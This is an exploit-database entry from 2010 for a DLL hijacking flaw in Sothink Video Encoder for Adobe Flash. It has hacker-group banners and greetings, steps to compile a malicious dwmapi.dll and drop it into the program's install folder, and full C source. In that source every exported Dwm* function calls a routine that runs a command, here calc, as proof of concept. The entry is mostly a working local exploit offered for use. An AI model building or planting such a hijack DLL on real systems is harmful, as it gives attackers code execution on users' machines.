Sothink Video Encoder for Adobe Flash DLL Hijacking Exploit (dwmapi.dll)

2010-11-22T00:00:00
ID 1337DAY-ID-14934
Type zdt
Reporter anT!-Tr0J4n
Modified 2010-11-22T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ========================================================================
Sothink Video Encoder for Adobe Flash DLL Hijacking Exploit (dwmapi.dll)
========================================================================

                         ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3                                                                      3
3             _     __       __    ________     __  __                 3
7           /' \  /'__`\   /'__`\ /\_____  \   /\ \/\ \                7
1          /\_, \/\_\L\ \ /\_\L\ \\/___//'/'   \_\ \ \ \____           1
3          \/_/\ \/_/_\_<_\/_/_\_<_   /' /'    /'_` \ \ '__`\          3
3             \ \ \/\ \L\ \ /\ \L\ \ /' /'    /\ \L\ \ \ \L\ \         3
7              \ \_\ \____/ \ \____//\_/      \ \___,_\ \_,__/         7
1               \/_/\/___/   \/___/ \//        \/__,_ /\/___/          1
3              >> Exploit database separated by exploit                3
3                     type (local, remote, DoS, etc.)                  3
7                                                                      7
1          [+] Site            : 1337db.com                            1
3          [+] Support e-mail  : submit[at]1337db.com                  3
3                                                                      3
7             ##############################################           7
1             I'm anT!-Tr0J4n 1337 Member from 1337 DataBase           1
3             ##############################################           3
3                                                                      3                                            
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7

/*
#Sothink Video Encoder for Adobe Flash DLL Hijacking Exploit (dwmapi.dll)

#Author    :   anT!-Tr0J4n

#Inj3ct0r Site: http://77.120.101.55

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil

#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member

#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com

#Software :   http://www.sothinkmedia.com/

#Product Version    :   3.1 (build) 304

#Tested on:   Windows XP/Vista/Windows 7




==========================

[>>] Compile code as dwmapi.dll


[>>] Move DLL file to the directory where Sothink Video Encoder for Adobe Flash  is installed


[>>] check the result --> [ Your System 0wn3d BY anT!-Tr0J4n ]
        
==========================


# dwmapi.dll(code)
*/
 
 
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void  DwmDefWindowProc() { evil(); }
DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void  DwmEnableComposition() { evil(); }
DLLIMPORT void  DwmEnableMMCSS() { evil(); }
DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void  DwmGetColorizationColor() { evil(); }
DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void  DwmSetPresentParameters() { evil(); }
DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}


=-=-=-=-=-==-=-=-=-==-=-=-=-=-=

#Inj3ct0r Site: http://77.120.101.55

#  submit  : [email protected]

=-=-=-=-=-==-=-=-==-=-=-=-=-=-=



#  0day.today [2018-02-06]  #